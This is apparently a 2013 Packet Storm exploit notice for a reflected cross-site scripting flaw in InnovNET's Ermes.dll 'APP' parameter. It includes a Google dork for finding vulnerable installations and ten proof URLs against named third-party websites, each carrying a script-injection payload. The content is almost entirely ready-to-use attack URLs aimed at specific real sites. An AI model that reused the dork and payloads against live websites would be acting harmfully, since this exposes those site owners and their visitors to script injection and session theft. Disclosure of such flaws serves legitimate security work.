InnovNET Cross Site Scripting

2013-08-30T00:00:00
ID PACKETSTORM:123021
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-08-30T00:00:00

Description

                                        
                                            `#********************************************************************************  
# Exploit Title : InnovNET Cross site scripting vulnerability  
#  
# Software link : http://www.innovnet.fr  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Tested on: Windows 7 , Linux  
#  
# Google Dork : intext:"Powered by InnovNET"  
#  
# Date: 2013/08/30  
#  
--------------------------------------------------------------------  
# 1- Location : [Target]/cgi/Ermes.dll?A=&APP=[xss]  
#  
#  
# Proof:  
#  
# http://www.beugnet.com/cgi/Ermes.dll?A=&APP="/><script>alert(1);</script>  
#  
# http://www.cityboxe.fr/cgi/Ermes.dll?A=&APP="/><script>alert(1);</script>  
#  
# http://www.ruissol.pro/cgi/Ermes.dll?A=&APP="/><script>alert(1);</script>  
#  
# http://www.igtools.fr/cgi/Ermes.dll?A=&APP="/><script>alert(1);</script>  
#  
# http://www.kartix-parc.com/cgi/Ermes.dll?A=&APP=  
"/><script>alert(1);</script>  
#  
# http://www.lagendaducoin.fr/cgi/Ermes.dll?A=&APP=  
"/><script>alert(1);</script>  
#  
# http://www.geonord.fr/cgi/Ermes.dll?A=&APP="/><script>alert(1);</script>  
#  
# http://www.innovgestion.fr/cgi/Ermes.dll?A=&APP=  
"/><script>alert(1);</script>  
#  
# http://www.ermes.pro/cgi/Ermes.dll?A=&APP="/><script>alert(1);</script>  
#  
# http://www.primavera-feci.fr/cgi/Ermes.dll?A=&APP=  
"/><script>alert(1);</script>  
#  
#  
######################  
discovered by : ACC3SS  
######################  
`